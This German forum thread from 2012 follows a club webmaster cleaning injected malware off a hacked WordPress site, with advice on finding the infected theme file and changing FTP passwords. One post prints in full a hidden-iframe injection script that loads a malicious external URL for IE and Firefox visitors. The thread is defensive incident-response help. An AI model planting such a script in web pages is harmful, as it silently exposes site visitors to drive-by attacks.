Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Alles rund um Windows (https://www.trojaner-board.de/alles-rund-um-windows/)
-   -   Trojaner auf Website (https://www.trojaner-board.de/109395-trojaner-website.html)

clemixx 08.02.2012 18:33

Trojaner auf Website
 
Hallo Leute,

und zwar scheint es so als ob wir einen Trojaner auf unserer Vereinswebsite haben. (hxxp://www.ttcelbe.de/)
Es gibt verschiedene Symptome: Virenscanner meldet Viren, Java stürzt ab, WMP öffnet sich plötzlich, kurz nach Öffnen der Seite werden teilweise auch auf den jeweiligen Rechnern Viren gefunden.
Es gab eine Meldung des Trojaners "Exploit-CVE2010-0806" und die IP-Adressen von "hxxp://194.60.242.36/sv/count.php?add=1" bzw. "hxxp://194.60.242.166" werden als schädlich erkannt.
Der Hoster hat bei sich schon einen Virenscan durchgeführt, war aber fehlerfrei.
Könnt ihr mir weiterhelfen?

Viele Grüße
Clemens

Shadow 08.02.2012 18:50

Ja, möglich. :pfeiff:
Aber eigentlich sollte dies euer Webmaster tun und können.
Man müsste auch wissen, was wurde bereits getan bzw. wurde schon was getan?
Zumindest auf der Startseite befinden sich wohl Code-Reste die dort auf jeden Fall falsch sind - könnte aber die unsaubere und unvollendete Säuberung von der eventuellen Malware sein.

194.60.242.36 ist auf jeden Fall in Sibirien.

Auf welcher Seite kommt denn die Virenwarnung?

clemixx 08.02.2012 19:18

Einzige was bisher getan wurde, das Plugin von Google Analytics gelöscht, weil das da stand, als ich auf eine der IP-Adressen gegangen bin, aber hatte wohl eher weniger damit zu tun.

Die Meldung kommt bei jeder Seite, die man öffnet.

Ist ja die Frage, ob unbewusst irgendeine schädliche Datei hochgeladen wurde, die zu löschen ist oder sich jmd eingehackt hat und was eingepflanzt hat.

Shadow 08.02.2012 20:14

Möglicherweise/wahrscheinlich sitzt die Malware im "Theme" =>
...ttcelbe.de/wordpress/wp-content/themes/traction_pro/javascripts/ traction . js
Zeile 9

clemixx 08.02.2012 20:43

Cool, danke! Das scheint es wirklich gewesen zu sein, die eine Zeile wurde dort neu hinzugefügt und jetzt werden keine Meldungen mehr angezeigt.
Wie bist du auf die Datei gekommen?

Shadow 08.02.2012 20:59

Ohne JavaScript war nichts.
Direkte Links und in den Seiten (im Quelltext) sich befindende Scripts (bzw. der Quelltext an sich) schienen sauber zu sein, meinem Auge ist nichts aufgefallen außer auf der Startseite ganz unten nach </body> und </html> befindet sich noch ein </div>. Dies hat dort nichts zu suchen.
Allerdings ist dort unten "gerne" fremder ("illegaler") Content, deshalb habe ich u.a. dort manuell einfach im Quelltext nachgesehen.
Also musste die Malware in einem "externen" Script sein. Und weil mir es zu blöd war da alles manuell zu durchsuchen, habe ich zu meiner Linklesezeichenliste gegriffen.

http://sitecheck.sucuri.net/scanner/

Und die Zeile 9 hat auch (dann) das typische Aussehen eines maliciösen Inhalts gehabt. :blabla:
BTW:
Zitat:

Description: This malware infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site.

Note that every PHP, HTML and JS file can get compromised by this malware. On some variations of this attack, it is also compromised through vulnerable versions of Timthumb/WordPress.

Some anti virus programs will flag this type of malware (after infecting a computer) as Blackhole Exploit kit or similar names.

Affecting: Any web site with FTP enabled (and password stolen).

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.
(Desktop bezeichnet hier einen "Desktop-PC")

clemixx 09.02.2012 11:26

Achso alles klar, die Seite muss ich mir gleich mal merken ;-)

Ist es jetzt auch am sinnvollsten FTP-PW etc. zu ändern?

Shadow 10.02.2012 09:56

Ja, unbedingt das FTP-Passwort (alle!) ändern.

Also die Passwörter aller (!) FTP-Zugänge zu dieser Internet-Präsenz und außerdem sollten ALLE PCs, auf denen ein FTP-Zugang zu dieser Internetpräsenz eingerichtet ist, sorgfältig und tiefgehend überprüft werden und zumindest auf dem ursächlichen PC auch wiederum alle FTP-Passwörter geändert werden.

clemixx 27.06.2012 12:44

Hey,
ich muss mich jetzt nach einiger Zeit nochmals melden. Gleiche Website - ähnliches Problem. Ich weiß nicht, ob es noch Überreste der letzten Malware sind oder ob es wieder etwas neues ist. Jedenfalls wurde unsere Website nun von Google gesperrt. Jedoch ist sie (meist) nur im FF nicht erreichbar.
Problem, was ich bisher gefunden habe - fremder Code am Ende der Startseite:

Code:

<script>var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>
Weiß blos nicht woher der Code stammt. Habe auch schon meinen erhaltenen Webspace nahezu platt gemacht (soweit, dass Wordpress keie Fehler bringt) aber im Quellcode war immernoch die Meldung als Einziges vorhanden und die übrigen Dateien wiesen keine großen Auffälligkeiten auf. Kann ich überhaupt was dagegen machen oder ist mein Hoster betroffen? Denn, wenn ich die ebenfalls infizierten Websites der Google-Diagnoseseite ansehe, sind einige davon ebenfalls beim gleichen Hoster!

Danke für eure Hilfe...
clemixx

Shadow 27.06.2012 13:13

Du hättest dir BEVOR du was verändert hattest, einfach mal Datum und Uhrzeit ansehen sollen.

Es ist immer auch ein Möglichkeit, dass ein Hoster eines Multidomainservers tatsächlich auch ein grundlegendes Problem hat, dann sollten aber eher alle Domains/Websites auf mindestens diesem einem Server betroffen sein.

An sich ist meines Wissens dein Hoster aber nicht als dunkleres Schaf (grau oder schwarz) bekannt.
Allerdings können falsche Rechtevergabe und veraltete Serversoftware, PHP-Versionen und darauf aufsetzende Anwendungen schon auch Lücken schaffen. Und mancher Hoster belässt auf alten Verträgen/alten Servern auch längst grob veraltete Software.

clemixx 27.06.2012 13:31

Von allen hab ich das nicht getan, aber bei den Hauptdateien war nichts auffälliges.

Ja dächte ich eigentlich auch nicht, aber da es nun doch anscheinend bei einigen Websites diese Probleme gibt und sich der Hoster auch nicht auf meine Nachfragen meldet..! Muss ja auch nur mindestens dieser eine Server betroffen sein..

Noch etwas, was ich an meiner Stelle jetzt tun kann?

Shadow 27.06.2012 14:08

Zitat:

Zitat von clemixx (Beitrag 852785)
Noch etwas, was ich an meiner Stelle jetzt tun kann?

Augen auf und eine neue Seitenüberprüfung bei Google beantragen.
Du magst einfach mal bei den dir bekannten Websites mit ähnlichem/gleichem Problem schauen, ob sie auf dem selben Server liegen
ping domain-name.tld
Darüber hinaus kontrolliere ob Server-Software (Webserver, PHP etc.) aktuell ist. Wenn nicht, sprich deinen Hoster mal auf eine Aktualisierung an, es ist aber Branchenüblich, dass die Software gerne auf dem Stand des Vertragsabschlusses bleibt (vorallem wenn der alte Vertrag irgendwo besser ist, du also für diese Leistung UND neues PHP (als Beispiel) etwas mehr zahlen musst).

clemixx 27.06.2012 15:16

Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist.
Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?!
Also der Großteil der betroffenen Websites liegt tatsächlich auf dem gleichen Server.
Ja das ist richtig, die Software ist nicht die aktuellste, könnte man in Zukunft aktualisieren.

Shadow 27.06.2012 16:43

Zitat:

Zitat von clemixx (Beitrag 852882)
Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist.
Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?!

Ich hatte mal eine Kunden-Website - also seit dem habe ich diesen Kunden auch dort als Kunden, vorher nur die PCs - mit solchartiger Malware (ich weiß aber jetzt den echten Hoster nicht mehr, war über einen kleinen Reseller bei einem kleinen Wiederverkäufer der Reseller bei einem größerem Wiederverkäufer ....), da hat Google relativ schnell reagiert, wenn man darauf wartet natürlich eindeutig nicht schnell genug.

Erreichbar ist die Site (technisch) natürlich schon, nur nicht über die Google-Suche und nicht direkt und ohne Warnhinweis über Browser, die sich auf Googles Warnung verlassen.

clemixx 27.06.2012 17:37

Naja erreichbar ist sie vlt, aber sollte man ja aufrgund der Malware schon meiden, was?

So nachdem ich im Wordpress-Verzeichnis ewig nach Infektionen gesucht habe, habe ich nun gesehen, dass sich im root noch eine index.php befindet, in der relativ lange Zeichenketten eingebunden waren, die so da nicht hingehörten. Ob die wohl durch ein Plug-In, der (leicht) veralteten Software auf dem Server oder anderes dahin gelangt sind, weiß ich nicht. Aber jetzt sollte es zumindest wieder gehen. ;)

TrojanerHunterNEW 27.06.2012 18:12

Ich weiß jetzt nicht wie man das ergebnis nun einschätzen soll, https://www.virustotal.com/url/1e11f...is/1340816965/

THN

Shadow 27.06.2012 18:19

Zitat:

Zitat von TrojanerHunterNEW (Beitrag 853058)
Ich weiß jetzt nicht wie man das ergebnis nun einschätzen soll,

Na, eine Warnmeldung ist (jetzt) sowieso für die Katz, weil es genau eben um diese Google-Warnung geht.
Und definitiv (!) ist Google-Safebrowsing-"Analyse" keine "Echtzeitanalyse".
Die Meldung von Trendmicro müsste an mal darauf ansehen ob die aktuell nachsehen oder auch mal (für Google?/von Google?) u.U. veraltetet Informationen sammeln.

TrojanerHunterNEW 27.06.2012 19:07

Also meinst du das muß nichts heißen, oder alles, oder F/P ....

THN

clemixx 28.06.2012 10:06

So, Google hat die Seite nun als nicht mehr bedrohlich eingestuft und sie ist wieder erreichbar. Eine Meldung bei Trendmicro bzw. Sucuri SiteCheck wird immernoch angezeigt, aber denke dass es keine Echtzeitanalyse ist.

andreas6 02.07.2012 11:46

Hallo,

ist diese Warnmeldung echt oder sollte man sich von dieser Website fernhalten:

hxxp://sitecheck.sucuri.net/results/www.changetec24.de

MfG. Andreas

Shadow 02.07.2012 15:31

Zitat:

Zitat von andreas6 (Beitrag 855646)
ist diese Warnmeldung echt oder sollte man sich von dieser Website fernhalten:

Echte verstehe das "oder" nicht, oder meinst du mit Website sucuri.net?

Auf jeden Fall erkennen einige Websitescanner keine Malware, sucuri.net selber sagt bei "Blacklistingstatus", dass niemand (davon) die Site als gefährlich ansieht und bieten für den Fall des Falls ihre (kommerziellen) Dienste an.
Virustotal sucht schon seit einiger Zeit und sucht und sucht.

Definitiv (!) gibt es aber auf dem Webspace eine deutlich veraltete
jQuery JavaScript Library v1.4.2 an deren Ende codierter, sehr wahrscheinlich tatsächlich bösartiger Inhalt angehängt wurde. Ob auf diese (veraltete) Library beim normalen Websitebesuch zugegriffen wurde, habe ich jetzt nicht geprüft, dazu fehlt mir die Zeit.
Die weiteren Fundstellen habe ich nicht überprüft.
Hast du mit denen (changetec24) was zu tun?

andreas6 02.07.2012 18:17

Hallo,

Danke für Deine Einschätzung. Die Anfrage habe ich wohl falsch formuliert, sorry. Mit der Website habe ich nichts zu tun, vor einem Sprung dorthin aber mal sucuri vorgeworfen. Ebenso vorhin hxxp://sitecheck.sucuri.net/results/www.datasheetcatalog.org - dort scheint viel Binärzeug drin zu stecken. Früher habe ich diese Website öfter benutzt, da war sie wohl sauber. Heute warnt schon Google davor.

MfG. Andreas


Alle Zeitangaben in WEZ +1. Es ist jetzt 04:32 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131